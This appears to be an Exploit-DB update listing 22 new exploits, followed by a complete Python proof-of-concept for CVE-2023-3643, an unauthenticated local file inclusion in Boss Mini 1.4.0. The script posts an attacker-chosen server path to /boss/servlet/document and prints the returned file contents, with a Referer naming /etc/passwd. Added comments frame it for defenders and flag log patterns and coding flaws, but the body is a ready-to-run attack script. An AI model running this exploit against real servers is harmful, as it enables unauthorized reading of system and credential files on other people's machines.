
22 changes to exploits/shellcodes/ghdb GL.iNet AR300M v3.216 Remote Code Execution - CVE-2023-46456 Exploit GL.iNet AR300M v4.3.7 Arbitrary File Read - CVE-2023-46455 Exploit GL.iNet AR300M v4.3.7 Remote Code Execution - CVE-2023-46454 Exploit Maxima Max Pro Power - BLE Traffic Replay (Unauthenticated) R Radio Network FM Transmitter 1.07 system.cgi - Password Disclosure TitanNit Web Control 2.01 / Atemio 7600 - Root Remote Code Execution TPC-110W - Missing Authentication for Critical Function A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc Easywall 0.3.1 - Authenticated Remote Command Execution Magento ver. 2.4.6 - XSLT Server Side Injection AC Repair and Services System v1.0 - Multiple SQL Injection Enrollment System v1.0 - SQL Injection Petrol Pump Management Software v.1.0 - SQL Injection Petrol Pump Management Software v.1.0 - Stored Cross Site Scripting via SVG file Petrol Pump Management Software v1.0 - 'Address' Stored Cross Site Scripting Petrol Pump Management Software v1.0 - Remote Code Execution via File Upload Real Estate Management System v1.0 - Remote Code Execution via File Upload Simple Student Attendance System v1.0 - 'classid' Time Based Blind & Union Based SQL Injection Simple Student Attendance System v1.0 - Time Based Blind SQL Injection Boss Mini 1.4.0 - local file inclusion Windows PowerShell - Event Log Bypass Single Quote Code Execution
# Exploit Title: Boss Mini 1.4.0 - local file inclusion
# Date: 07/12/2023
# Exploit Author: [nltt0] (https://github.com/nltt-br)
# CVE: CVE-2023-3643

'''
_____ _ _____
/ __ \ | | / ___|
| / \/ __ _| | __ _ _ __ __ _ ___ ___ \ `--.
| | / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \
| \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ /
\____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/
__/ |
|___/
'''

from requests import post
from urllib.parse import quote
from argparse import ArgumentParser
# Proof-of-concept request for the issue named in this file's header
# (CVE-2023-3643): one POST to /boss/servlet/document whose `path` form field
# names a file on the server. The request carries no credentials or session
# cookie. For defenders, the observable is exactly that request shape; the
# remedy is the vendor's fix for the CVE plus limiting who can reach the
# application's web interface.
try:
    # Command line: --domain is the target application, --file is the
    # server-side path whose contents are requested.
    cli = ArgumentParser(description='Local file inclusion [Boss Mini]')
    cli.add_argument('--domain', required=True, help='Application domain')
    cli.add_argument('--file', required=True, help='Local file')
    args = cli.parse_args()

    target = args.domain

    # quote(..., safe='') percent-encodes every reserved character, '/'
    # included. requests form-encodes `data` once more, so on the wire the
    # body carries doubly encoded sequences (for example %252F for '/'),
    # which is a useful pattern when searching proxy or WAF logs.
    encoded_path = quote(args.file, safe='')

    # NOTE(review): the same --domain value is used verbatim as the URL
    # prefix, as the Host header, and inside an https:// Referer; those three
    # uses expect different forms of the value.
    endpoint = '{}/boss/servlet/document'.format(target)

    # Browser-like headers; the order below is the order the original used.
    request_headers = {
        'Host': target,
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange',
        'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(target)
    }

    form_fields = {'path': encoded_path}

    try:
        # verify=False switches off TLS certificate validation, so the peer
        # is not authenticated. No timeout is passed, so the call can block
        # for as long as the server keeps the connection open.
        response = post(
            endpoint,
            headers=request_headers,
            data=form_fields,
            verify=False,
        )

        # Only a 200 response body is shown; every other status code is
        # dropped without any message.
        if response.status_code == 200:
            print(response.text)

    except Exception as e:
        print('Error in {}'.format(e))

except Exception as e:
    # Catches failures outside the request itself (argument parsing exits via
    # SystemExit, which is not an Exception and therefore passes through).
    print('Error in {}'.format(e))